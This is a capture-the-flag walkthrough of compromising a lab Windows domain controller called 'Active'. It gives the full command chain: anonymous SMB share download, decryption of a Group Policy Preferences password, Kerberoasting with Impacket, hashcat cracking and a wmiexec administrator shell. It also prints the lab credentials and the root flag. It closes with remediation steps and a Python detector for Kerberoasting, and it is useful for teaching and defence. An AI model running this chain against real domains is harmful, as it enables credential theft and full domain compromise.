Enumeration
Nmap Scan
Comprehensive port scan revealed a Windows Server 2008 R2 Domain Controller:
nmap -sS -sC -A -T4 -oN first.scan -p- 10.10.10.100
Key Services:
- Port 53: DNS
- Port 88: Kerberos
- Port 135: MSRPC
- Port 139/445: SMB/NetBIOS
- Port 389/636: LDAP
- Port 3268/3269: Global Catalog
Domain identified: active.htb
SMB Enumeration
Share Discovery
smbclient -L //10.10.10.100
Accessible shares (anonymous login):
- NETLOGON
- Replication
- SYSVOL
- Users
Replication Share Access
smbclient //10.10.10.100/Replication
Downloaded entire share recursively:
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
Credential Discovery - GPP Password
Groups.xml Discovery
Found in: active.htb/Policies/{GUID}/MACHINE/Preferences/Groups/Groups.xml
Vulnerability: Group Policy Preferences (GPP) stores the account password in the cpassword attribute, AES-encrypted with a fixed key that Microsoft published, so it is effectively plaintext.
Password Decryption
Microsoft published the AES key, making GPP passwords trivially decryptable:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Decrypted credentials: SVC_TGS:GPPstillStandingStrong2k18
Initial Access
SMB Authentication
smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //10.10.10.100/Users
Successfully authenticated! Navigated to user directory:
smb: \> cd SVC_TGS/Desktop
smb: \SVC_TGS\Desktop\> get user.txt
User flag obtained!
Privilege Escalation - Kerberoasting
LDAP Enumeration
Querying Active Directory for active user accounts:
ldapsearch -x -H 'ldap://10.10.10.100' \
-D 'SVC_TGS' \
-w 'GPPstillStandingStrong2k18' \
-b "dc=active,dc=htb" \
-s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" \
samaccountname | grep sAMAccountName
Results:
- Administrator
- SVC_TGS
Alternative method using Impacket:
GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
Service Principal Name (SPN) Discovery
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request
Administrator SPN found: active/CIFS:445
Kerberos TGS ticket extracted!
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$65da2b...
Ticket Cracking
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt --force
Cracked in 4 seconds:
Administrator:Ticketmaster1968
Root Access
WMI Execution
wmiexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Remote shell as Administrator obtained!
C:\> cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
f99bf9c9cc2aa166f582889914746efb
Root flag captured!
Attack Chain Summary
- Anonymous SMB → Access to Replication share
- GPP Password → Found encrypted password in Groups.xml
- gpp-decrypt → Decrypted to obtain SVC_TGS credentials
- SMB as SVC_TGS → User flag
- LDAP Enumeration → Identified Administrator account
- Kerberoasting → Extracted TGS ticket for Administrator
- Hashcat → Cracked Kerberos ticket
- WMIExec → Administrator shell and root flag
Key Takeaways
Vulnerabilities Exploited
- Anonymous SMB Access - Replication share accessible without authentication
- GPP Password Vulnerability (MS14-025) - Encrypted passwords in SYSVOL/Replication
- Kerberoasting - Any authenticated domain user can request a TGS ticket for an account with an SPN; the ticket is encrypted with that account's password hash, so it can be cracked offline
- Weak Password - Administrator password crackable with rockyou.txt
Remediation
- Disable anonymous SMB access
- Apply MS14-025 (stops new cpassword entries being written) and remove existing Groups.xml files containing cpassword from SYSVOL
- Use Managed Service Accounts (MSAs) or Group Managed Service Accounts (gMSAs)
- Implement strong password policies (25+ characters for service accounts)
- Monitor Event ID 4769 for service-ticket requests using RC4 (Ticket Encryption Type 0x17) against user service accounts, especially many such requests from one account or client in a short window
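Added example (not part of the original writeup): a minimal detection over constructed Event ID 4769 records that flags the pattern above, an account pulling RC4-encrypted service tickets for user accounts with SPNs such as Administrator here. The record field names and the sample values jdoe, sqlsvc, DC$ and the client addresses are assumptions constructed for the example.

```python
"""Flag likely Kerberoasting in Windows Security Event ID 4769 records."""
from collections import defaultdict

# Constructed sample records (not from the page). The fields mirror 4769's
# Account Name, Service Name, Client Address and Ticket Encryption Type.
SAMPLE_4769 = [
    {"account": "SVC_TGS@ACTIVE.HTB", "service": "krbtgt",
     "client": "10.10.10.50", "etype": "0x12"},
    {"account": "SVC_TGS@ACTIVE.HTB", "service": "Administrator",
     "client": "10.10.10.50", "etype": "0x17"},
    {"account": "SVC_TGS@ACTIVE.HTB", "service": "DC$",
     "client": "10.10.10.50", "etype": "0x12"},
    {"account": "jdoe@ACTIVE.HTB", "service": "DC$",
     "client": "10.10.10.51", "etype": "0x12"},
    {"account": "SVC_TGS@ACTIVE.HTB", "service": "sqlsvc",
     "client": "10.10.10.50", "etype": "0x17"},
]

RC4_HMAC = "0x17"   # etype that yields the $krb5tgs$23$ hashcat format


def is_roast_candidate(ev):
    """True for an RC4 service ticket issued for a user service account.

    krbtgt is excluded (that is a normal TGT request) and machine accounts
    ending in '$' are excluded: their random 120-char passwords are not
    realistically crackable, so they are noise for this detection.
    """
    svc = ev["service"]
    return (ev["etype"].lower() == RC4_HMAC
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))


def detect_kerberoast(events, threshold=1):
    """Group candidate tickets by (requesting account, client address).

    Returns {(account, client): [service names]} for every requester that
    obtained at least `threshold` crackable tickets. Raise the threshold in
    domains where legacy RC4 is still common; where AES-only is enforced,
    a single 0x17 ticket is already anomalous.
    """
    hits = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            hits[(ev["account"], ev["client"])].append(ev["service"])
    return {k: v for k, v in hits.items() if len(v) >= threshold}


if __name__ == "__main__":
    for (acct, client), services in detect_kerberoast(SAMPLE_4769).items():
        print(f"ALERT {acct} from {client} requested RC4 TGS for {services}")
```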
Tools Used
- nmap
- smbclient
- gpp-decrypt
- ldapsearch
- Impacket suite (GetADUsers.py, GetUserSPNs.py, wmiexec.py)
- hashcat
Techniques
- SMB enumeration
- GPP password decryption
- LDAP queries
- Kerberoasting (TGS-REP ticket extraction and cracking)
- WMI command execution